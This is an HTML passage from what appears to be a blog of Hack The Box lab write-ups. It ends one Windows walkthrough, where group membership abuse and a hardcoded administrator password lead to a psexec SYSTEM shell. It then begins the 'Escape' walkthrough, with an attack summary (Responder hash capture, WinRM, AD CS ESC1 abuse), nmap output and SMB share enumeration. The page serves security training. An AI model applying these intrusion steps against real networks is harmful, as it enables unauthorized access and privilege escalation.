url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABxklEQVR42m1S2XLbMBDTr1g+dF/UfVmXlWhcp04z0///FBRLJT1m+oARlyKxALiGG/Xwk6tGoAaERPAXwnRClE3w4h5np8DhrHC0UqLA0a5wdD5h5TicQhjmJUNAsigd4QQdgphEyUiikUSzJgzUqM8k+YI4W3Bymj9EAruEeY65zmB4UQfLq9m9xMne4ceieIDLf2e32mvC8loqKf9V5tQwqdi0qNytYeT1K5W1EKVedEVavqAd3ogH2uuDjSpk1Quq7o6yvfNsT4X1fwjTndBjhpZXacKI9go2CJJBI6blXfG+rkiYVa+w/Q4HyZCEptj9zM90chhyURULld2gmFFa3LhetVLFtTgo2w1u2LPhrAmzemO2My5+Azvs+G1xYTQnK4FR93es209Mtw+NfvpOJdtviw1td7QvTWRP6rp/aNJAsUGzQTGSmM1d5myIKrkwTE9N2I1vez2/k/yJq+yvHxiWd8Q86zNnla8cL45TuiChk4gvL6RRfoNRsUPTf9MPMJJEExJiUyyqYtXWJUcZG4GoFesJiQUxiVLWotjImJ+oG+YnRqqYlh8oxQb3vzIUiF0ZHZnVL1geM2R+8kgyUme3wS92HkXuoJQ3FwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="PowerView ps1" title="" src="/static/d56c4ebd80aaea11465625f15640e93d/50637/powerview.png" srcset="/static/d56c4ebd80aaea11465625f15640e93d/dda05/powerview.png 158w, /static/d56c4ebd80aaea11465625f15640e93d/679a3/powerview.png 315w, /static/d56c4ebd80aaea11465625f15640e93d/50637/powerview.png 630w, /static/d56c4ebd80aaea11465625f15640e93d/62d75/powerview.png 697w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I logged in over SSH as <code class="language-text">claire</code> with the new password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 452px; " > <a class="gatsby-resp-image-link" href="/static/845b047d079814a356e0aa09f7669586/39613/ssh-claire.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABL0lEQVR42m1Q7W6CQBDkVQqGQ6igghwgXDkLKAJ+xFiNbRrf/yWme9ea9Ic/JnO72dmdOcOe5mDJgBG/wMlucItvTNItEtHieL6j339hO9zQ7T5xON0h6iOsMcfoCUwWwfBCCT/dISwGJEWH5duAkkSZ6JEsWxRyD04czCVGTowXO4JF/B8mW8C0Q1jERlH2qNZHdMMVsjqgbs9o+yuSvIV4P6DZXlBtPvSB7K2HbE5wgxzOZAnmZRgTKzA3o4Mchj8vMY1WmMcVZosV4mxNjjbUk9Srqd4g5I2eCQiLdI2I1/qg0qpazfiUwGLx78IoqSkqORAdXD/Xy1TvcUgv/hMqNyqaEluMazbtWLN2GKcNinKAkDuI1R6Ol+qlXlBofrxfpwKTmaCYqf5LJX6GHwTaxqVuv379AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ssh claire" title="" src="/static/845b047d079814a356e0aa09f7669586/39613/ssh-claire.png" srcset="/static/845b047d079814a356e0aa09f7669586/dda05/ssh-claire.png 158w, /static/845b047d079814a356e0aa09f7669586/679a3/ssh-claire.png 315w, /static/845b047d079814a356e0aa09f7669586/39613/ssh-claire.png 452w" sizes="(max-width: 452px) 100vw, 452px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The only member of <code class="language-text">backup_admins</code> was <code class="language-text">ranj</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 563px; " > <a class="gatsby-resp-image-link" href="/static/4b1e06484b9c4afa7e5ec86868872643/c6e12/net-group-backup_admins.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA5UlEQVR42nXRbW7CMAwG4J4llLYkI6UfaUo6ChTQJoSmTbv/Wd7ZTqexif14ZDV2rdhJ/PCKw+UDp5dPrOs9Gn/GOL0hjDfsp3eUzRG2OaBsOR4pTqi6E0w1QuUtFqzwpBdJTckwXqHtMyUdliuP4imQAbkJSKW4+0VRHddyLqUm6dxMGlZuQttfkOkeKmulkKPKnFjkd83yR7xQs6QwW5hyB0M31Hf4TNtv9G13UfnXKPRMRra0uzhmwGo9CB45iueZ3v4jiOVMGvJD8ONsaPE8viMbeoDaUa47oyb8c9zZIz87/AJG/bxoTQ7xAQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="net group Backup_Admins" title="" src="/static/4b1e06484b9c4afa7e5ec86868872643/c6e12/net-group-backup_admins.png" srcset="/static/4b1e06484b9c4afa7e5ec86868872643/dda05/net-group-backup_admins.png 158w, /static/4b1e06484b9c4afa7e5ec86868872643/679a3/net-group-backup_admins.png 315w, /static/4b1e06484b9c4afa7e5ec86868872643/c6e12/net-group-backup_admins.png 563w" sizes="(max-width: 563px) 100vw, 563px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I added <code class="language-text">claire</code> to <code class="language-text">backup_admins</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 563px; " > <a class="gatsby-resp-image-link" href="/static/8ce5e8f3620c87d974ac3c2ef87386d5/c6e12/add-claire-backup_admins.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRklEQVR42nWS6ZKDIBCEeZZEE+KtAS8MGs3lVrZ2q/b9n6V3QJPaw/z4ikGh6YZhUdZCVhcU6oYg0UjEEfv8hCjrkOWDnSdiQDqTiB6iuCDe94jSzq4zdRC3WG0LsEwOKJsRuv+AqSs1om7eaNOZDhnnw0b4scYuVPCig4UHVIcNfWue87UR3Hgl/VDwI4WtV2FHP7hfz3VtRfg8ms1W6CmQz0g7OrwEK9UVunvHcP4i2xp5dUNLbpW+oxs+Kc7Rxk7lMEWXJ+zJvYnp8OIfrKa7093dOlxvJDkrrUsbh5w5TwdywdGCYF6eYXDNoo3AypWEsKzdScjhS6LLsO2uACdXflgTk7MH5i4Nnn2M5geHlzBBLVLQSxpBL5gxYl5Nr36iVumnR/KrP9SLsJQu/RE7TlsI6j3TPmHS2tYxJLTG/RX7dfxv/Occ/mwtI8gAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="net group Backup_Admins claire /add" title="" src="/static/8ce5e8f3620c87d974ac3c2ef87386d5/c6e12/add-claire-backup_admins.png" srcset="/static/8ce5e8f3620c87d974ac3c2ef87386d5/dda05/add-claire-backup_admins.png 158w, /static/8ce5e8f3620c87d974ac3c2ef87386d5/679a3/add-claire-backup_admins.png 315w, /static/8ce5e8f3620c87d974ac3c2ef87386d5/c6e12/add-claire-backup_admins.png 563w" sizes="(max-width: 563px) 100vw, 563px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>For the changes to take effect, I logged out and logged back in. I then had access to <code class="language-text">C:\Users\Administrator\Desktop</code>, but didn't have access to <code class="language-text">root.txt</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 502px; " > <a class="gatsby-resp-image-link" href="/static/4c5c88491d5e228a54678a74a54d5212/a24c3/root-txt-access-denied.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 75.9493670886076%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACn0lEQVR42mVT2VLbQBD0nwR8G9uy7suSbEm+MGADBSFU8v+/0ekeAxUqD1O70mpbfcx0hm6BYXpCP3nFtHjHvHhBUOyxv/uF4/kPtsc3tPsXPr/Bz7boTWIMblKr/iRhxeiNI/RGIbpDH51FskFUPyNvHrFqn1DvXmzNV/dYbR5RNmcswhrDaWZ1PYrQZV0PA1wNfK4+wQIDVHWy8hb19oxm+2yX28MLivUD0vKIhsyq9tH2ZXOy946/xmxRYuZVcII1pm5F1slXdaZuSQYNwmwPP97AY/lkvQhqhOkWXtRwv8bcWxlYmO34roXLCnju8nw8X2I0y8iQkqdeaQBLStSHE2eJkM9+fAHyI4E3dlEAQbJFlB+MhBe3VkHaIko3GNGSjuOvkCz3qCg3THdw+WHENSLjvLpHzMsqA+K7KN8jXh5MjULpDhWGfI3RH6cCXGN3/GmA8mjFVfv15smAyvWJCb8jLY4mqz+ODWgwYcrj5J9KL4AT6neZ4sK/+DSjp/JNTOfe2pi4Jm/zEUjFbyrKy+lZ/D/glIn58oG1oPw505N3ki9Pk+WteaiQBCzpOtM9sf3OlIAxU4vpS0m5AcPQPi1uEdOvHvtNkj0CXfXZb8MY1wP24CC0EkP5ZzZ8AhZM98CpuDv9RkYgeVez5GOPH2/3r/zJzoB0QWzL+mT+iqkUjGfLD/kElIyEqankjfzLGEBVn+HQ06FGjAx0YUzfBFDyTB1w43Bsb7JvsjuKXXJ+9Dx0JaUfWEACDBiEANXgskKssvKePfvAFjqYx2In+V+An6mmZOgxbY2VF7YG6msilHB0KQVySb01MKXu+OqQ2ppaKjr6e8VAcs6rpOblHRIymVKOY21U2d7ml3u11mUMa0oumXZl68WaBH8BcZDsD2kzITMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root.txt access denied" title="" src="/static/4c5c88491d5e228a54678a74a54d5212/a24c3/root-txt-access-denied.png" srcset="/static/4c5c88491d5e228a54678a74a54d5212/dda05/root-txt-access-denied.png 158w, /static/4c5c88491d5e228a54678a74a54d5212/679a3/root-txt-access-denied.png 315w, /static/4c5c88491d5e228a54678a74a54d5212/a24c3/root-txt-access-denied.png 502w" sizes="(max-width: 502px) 100vw, 502px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">Backup Scripts</code> directory contained some PowerShell scripts and text files:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 528px; " > <a class="gatsby-resp-image-link" href="/static/6f033e2b8373754a5f64c81f34f6c7a3/1510a/backup-scripts.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 56.9620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB90lEQVR42m1S2XabQBTjU1LjJbbZzL6DwQYTL9lOT0/7//+h6l4nTR/yoDMzwAhJV8bWqeCFe4TpEZZXwXJ59vdwCT/qYfsN3KDFLuzhxweih8N3jt8iSI5wdnzH77yww2KdwpBN27+gH94RZwOS/ISiOqNsrqjaG/L6jKK56OWkmBBlo65xdiL5UZ9H3LtBB3OVwHB2DfYkzIoTsvJJCZvuRdeAiur9DQ3fW16N2TLipfhbzB8ThbGxclps4NCuzUsbu+S5vVuherVPyxKLuHGD++qFvdq2vEbVLTeZEhs2M0vEKiFEHi+EtBEwFyFMaU8u2rtaVyEUAiGV89at/yOkwig5oO2e1bYQ5tUTcdGhrK2C+b5iQSuzZUhLERHjYR7ix0Jwj0Ci+Gc5pbLj+K4QwoKEkqEfHWDyw8dtjjkvre0CJfOsuxu64xsq7m3GIoQy3S9Chj+efmI6/6LNDk171YnLUB7M4K6OaqRC8rwb3jBdf+sqTQjTQe1+qlTLYlfgcuJpPqKkSpn+J6EolR5mWpeRKp+RlhNrdWU8Z2Y+sK+MiAM1fIZbsmsVu2Y5JSJW5UAlcha7X4Qdpssf7eyBjlLWLObPtxyqxCEQpcacYc/mPsxFANkvVpFOXH5ic4IWIaqko2JRFMlZ2rChABmWuYo+EOMvmfNquzWgw1kAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Backup Scripts" title="" src="/static/6f033e2b8373754a5f64c81f34f6c7a3/1510a/backup-scripts.png" srcset="/static/6f033e2b8373754a5f64c81f34f6c7a3/dda05/backup-scripts.png 158w, /static/6f033e2b8373754a5f64c81f34f6c7a3/679a3/backup-scripts.png 315w, /static/6f033e2b8373754a5f64c81f34f6c7a3/1510a/backup-scripts.png 528w" sizes="(max-width: 528px) 100vw, 528px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">BackupScript.ps1</code> had a hardcoded password for the <code class="language-text">administrator</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/be1b8a2d3953700cea285f8f28e5c669/abbf1/admin-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABN0lEQVR42i2Q63aCMBCEeZMe9FhQkTsBAZNAuFRrvb7/s0yHtD++M8luzmR2nXM94T69cO1vOKsrDO9KGPR5D5EohNSkMJa0GHBINCLWomzBIC5GvjGI2PfDE5w5lTA0UIlEl2kadZCpgj40CDYZPjY5XKprNcfqs7C4mwWBlVdi5ZNthTVxWvkNxWRNe0ZZTdDdDcPwtJqXA2J+kIpFl0SdJUw178YmXNPQ9YRlMXZkf0c3vtDQtKhnKPOw56q9QHINjfph7QnVP3DSN9YeEPUX+vHNDydrvI8V12CwjSSc+nSBmd84MumBY4vjhKKasQ9b+EGNLUf3g4baWv7ODXbsL+xp4rO+o3rsOa2+MsEdRTki4igJRzsyXSa4bO4yiKUlYYIw7ew5Y7Iw+1vBkjD4T+gFLX4BjQ7Gn63lCwAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="admin password" title="" src="/static/be1b8a2d3953700cea285f8f28e5c669/50637/admin-password.png" srcset="/static/be1b8a2d3953700cea285f8f28e5c669/dda05/admin-password.png 158w, /static/be1b8a2d3953700cea285f8f28e5c669/679a3/admin-password.png 315w, /static/be1b8a2d3953700cea285f8f28e5c669/50637/admin-password.png 630w, /static/be1b8a2d3953700cea285f8f28e5c669/abbf1/admin-password.png 656w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Using the credentials, I obtained a system shell with <code class="language-text">psexec.py</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e80e390dad617aee910dc52443f21aa4/abbf1/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 82.91139240506328%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACkklEQVR42nWU63KaUBSFeZPGCIpX7ndRQFBMNNGkTdvpTN//LVbXPmKqk+THmrNB+fbaF9CG4R6D9A2D5BV+3qJ+eMN2/wuH17/YPf+Bl20xmKYwpgn64wi6aBKrazn1SdSdsfpdS6sT5lENJ9kiyncIFi2yck8dVBzynpds4PA/I3sBJ65hR6I15kGpTiduGFeYegU0nxfmLEVv6OPeDJQk/mZ46DGWrNcSh/1RSAWdrmJxWDQnFM0RyfIRYdYiSDcIkgbL9RNcZh/NMxhSjnrwAuskCU0f/aHIw/3AhZaXT6jb76h3P9R5TnBCe/iNMG0JXGDIHuqEXXQLI+hKWlY8Yr19QVEf32Frgt2oQbRgT9Mt5l4JYxyzHSEf8pX6FynwGd45PCCvntDs3pAVB6VVfSKsxUJd7+kwUc4E+u50HJ9b0IHO8jkU9ksk5fnxBh6HFHJVPDoUOT6nGK6VS5fTHVsLQsL3vp1P6akkSKCJk5ilhSwtygTawJISmb1nyJ+DM0CVe4kDBdFNOja5n2bcAWNoHrOKXLoI6HBmL2FyCON5jomVn09btMSUGoxZvhl1ipVugAISVz7Lk9j2S1VqEG95nwNxCyVxbXkVk2Wduy+A1eZVNb9qXiADkjjlTm4efqo29HQPd5SUfz8IrmBfAMWdw9fG5msjDr3OaSRDYizubA5mYi0VxBjFV8DoI9ALa055ox6UXtoszfErBNFG9VL6OLVXGE7STxx+dKkV3LmSy5zkDyjXR0gCyy1RML7TXTVlgYpDAcuQboG3UC1b7hHK14TO0vwRcbbDeLZQ0rkiE+7dsnqmjirR58D/pWv9gQedG25QlrNSwAkfkvWx1HQL7ik/Y0mLmVN80sNb6D9KfiG0ktD2QgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/e80e390dad617aee910dc52443f21aa4/50637/system-shell.png" srcset="/static/e80e390dad617aee910dc52443f21aa4/dda05/system-shell.png 158w, /static/e80e390dad617aee910dc52443f21aa4/679a3/system-shell.png 315w, /static/e80e390dad617aee910dc52443f21aa4/50637/system-shell.png 630w, /static/e80e390dad617aee910dc52443f21aa4/abbf1/system-shell.png 656w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-escape/https://mgarrity.com/hack-the-box-escape/Tue, 30 Jan 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/994c8af062c0b24752355225d3731cec/3b67f/escape.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/klEQVR42p2Ry0rDQBSGs9cq1thbLtquYiYFm5JaFLpwL8Yq2BoakVbFFygUq6iv4K7gs37OGLozU3VxGOZyvvkOv2E6grzacQVFS7BW9tmys73uvSpDB1uvCOyGoBMKnIZPoboaauTBNmTzcdRkOmzznEY8jSIOw+D7XAf9EVi0M6P5TZez05jzwT0XcZ/ZdYhVz+5/DVS/F+So7Zbg7fGE/tUDn4uFXO+YjXtE0lI3eq6hVd/n5faIZJhwOZiQJiPmaZfans+2/ceRSyoQadGRlu+THh/TmFdld5AFU3L/mbJqru56tJoeZddbGYgWuDQ1nYDNWoDpBlqzJfAL+DkFWkFmRfQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Escape" title="" src="/static/994c8af062c0b24752355225d3731cec/50637/escape.png" srcset="/static/994c8af062c0b24752355225d3731cec/dda05/escape.png 158w, /static/994c8af062c0b24752355225d3731cec/679a3/escape.png 315w, /static/994c8af062c0b24752355225d3731cec/50637/escape.png 630w, /static/994c8af062c0b24752355225d3731cec/fddb0/escape.png 945w, /static/994c8af062c0b24752355225d3731cec/3b67f/escape.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Escape is a Windows machine running Active Directory with an open SMB share containing credentials for an MSSQL instance. After connecting to the server, an NTLMv2 hash for <code class="language-text">sql_svc</code> can be captured by forcing an authentication attempt to a Responder SMB server. The hash can be cracked, allowing for a shell to be obtained over WinRM. Enumeration of the machine leads to the discovery of an error log which contains the credentials for <code class="language-text">ryan.cooper</code>. Moreover, Active Directory Certificate Services (AD CS) is in use on the domain, and a vulnerable certificate template (ESC1) can be exploited to request a certificate on behalf of the <code class="language-text">administrator</code> user. Once authenticated, the NTLM hash can be retrieved and then used to get a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text"># Nmap 7.93 scan initiated Thu Jan 25 23:41:20 2024 as: nmap -p1-10000 -Pn -sC -sV -oA nmap/output 10.10.11.202 Nmap scan report for sequel.htb (10.10.11.202) Host is up (0.040s latency). Not shown: 9986 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-26 04:44:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-01-26T04:45:49+00:00; +2m38s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-01-26T04:45:49+00:00; +2m38s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM |_ssl-date: 2024-01-26T04:45:49+00:00; +2m38s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-01-26T04:43:08 |_Not valid after: 2054-01-26T04:43:08 |_ms-sql-info: ERROR: Script execution failed (use -d to debug) |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2024-01-26T04:45:49+00:00; +2m38s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-01-26T04:45:49+00:00; +2m38s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2024-01-26T04:45:06 |_ start_date: N/A |_clock-skew: mean: 2m37s, deviation: 1s, median: 2m37s | smb2-security-mode: | 311: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jan 25 23:43:11 2024 -- 1 IP address (1 host up) scanned in 111.26 seconds</code></pre></div> <p>Notable open ports:</p> <ul> <li>53 (DNS)</li> <li>88 (Kerberos)</li> <li>135, 593 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>389, 3268 (LDAP)</li> <li>636, 3269 (LDAPS)</li> <li>1433 (MSSQL)</li> <li>5985 (WinRM)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: sequel.htb</li> <li>hostname: DC</li> </ul> <p>Enumerating shares with anonymous logon showed read access to the <code class="language-text">Public</code> share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6431a22b3585adf8be2082cb4059daf8/d2eea/netexec-list-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 51.26582278481012%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB50lEQVR42l2S2W7cMAxF/SmZzbtl2ZYl2fJ4iT0rMgmSpkD72P//iFtKMwWaPBDayMNLUp5fLtiJG/z6B5i8wAwvWM4/MZ8+0Y03tN0VfqzJGjA+IuPPiPmAsBzgZx2CpMEuqhAwg13awkuaTxTNBbyeMS0f6J/fMC7v0OaKsj2BTy+I2iNiMSE279h0v8Dn35D9FblckFYzwrRBwg0SSuL55g+CrEdEmfrpzQG78RWFmFHIA0HPCPM9dqRwFbVI1AkdJW6HG9T+CtMdUHCNwGdYbXN4rbmgyiW2gUReTeCkxK5hZhBTSUlGsFC5940vUTKFNJVYBXQXKchSoRUSPFdYk4+XiTOSVFOAQl6OzhhZRDALjBkBI3oPbYBCwWoIErAONDYh9ZagQaKpAjqTn9c0Z2jK0pUCZUXA6j8gI4XfgKqoUduKQu3syddY0boO7wk83VyhCwJWNWQ9gT3Kjh7qkrz/AhR57VTZvV1tu4LoDnPAjppuKglJjiWBSgLeFRpEVmH+TSGvsa8Eoli6O55JB/6n2JPdB2qakiDHwzBjbxaaLn0H3iMrrI3uD9pgO4hBCBy1oCSkkO5sXBArUqecjyfqo+uJLWVsemhpPy8pTGnKzLg+fimZAFal3dvpJ4l08O0D+Beo+EAWSxVfXQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec list shares" title="" src="/static/6431a22b3585adf8be2082cb4059daf8/50637/netexec-list-shares.png" srcset="/static/6431a22b3585adf8be2082cb4059daf8/dda05/netexec-list-shares.png 158w, /static/6431a22b3585adf8be2082cb4059daf8/679a3/netexec-list-shares.png 315w, /static/6431a22b3585adf8be2082cb4059daf8/50637/netexec-list-shares.png 630w, /static/6431a22b3585adf8be2082cb4059daf8/d2eea/netexec-list-shares.png 688w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Listed the files in the share with <code class="language-text">spider_plus</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/20e7612ffdcfb877e22fdf16c8a0376b/d2eea/netexec-spider_plus.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 112.0253164556962%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAYAAADAQbwGAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEFklEQVR42lVU2XLbRhDEh6QciQcA4r4WixsEQEIidTu2nKTiiit5zv8/dnoXolR+mAJRWPZ09/SOYYkZpnyEVXxGWJ1Rjw84nF8x3H5BNdyj7E/Y+hWrhJ/t4aUj3HSPUE4IxYAgH2Hyux3W+mk49TdEBArEiP38gnZ6Qnd8gahvkbS3CKd7WM0MOx9gN0/Y9K9I5j90M9HwTHmEE3ds1PPZwrD73+HsX+HnBw3WHp41y7Q6wiMjX46a4WaXY2ULXMcj0u4eeTUjJ6D3xjZiKVBj1b7iev4XjrxBs7/XoDWfiTzAY2c/6bF1C6ztnJVhFcxsdODZMwoyz4oRWXXALmqwdiSM7fAnVsd/sA4HiHJm3SAtZrjRAhaQwZYHV1aKtRkT8EB7jqhoh6xnpHJAnDaIlRJPeVg9wKrojd9oAFVe3MOmTIsH7De5651kUbbX0/waYdohiBvsOCzblTA9qb00rin50/QDW3ojaLBimJGhAvXjhaHplpQrNMMrb0JcnFF1Z8j2jl7f0ss7DW45GQyv/wt+/UQmDelfJB+1f4uHlKzYWRkrhxUekBQnpCUnLI+QHE4YVXB9CSugZNm8IA5ybGypAVUlnLjy8MLSdAr9fWUVyKISaaIy15BEjTYv0KUB4ijDFRsbCelHYQFzVyDKRl1K5o5/cIIWbtiS4QdgHOYQEeNjSe3rllaYVsQk0BY2Noqa408leiGQ5eM7qPMO2P0EKKIcSajACqxYv1olrjYRv9ESVwHS1CKRKBMBIfYIkgEha2HYwA1+ZpgSTL1f8beyQsSc8I6MNy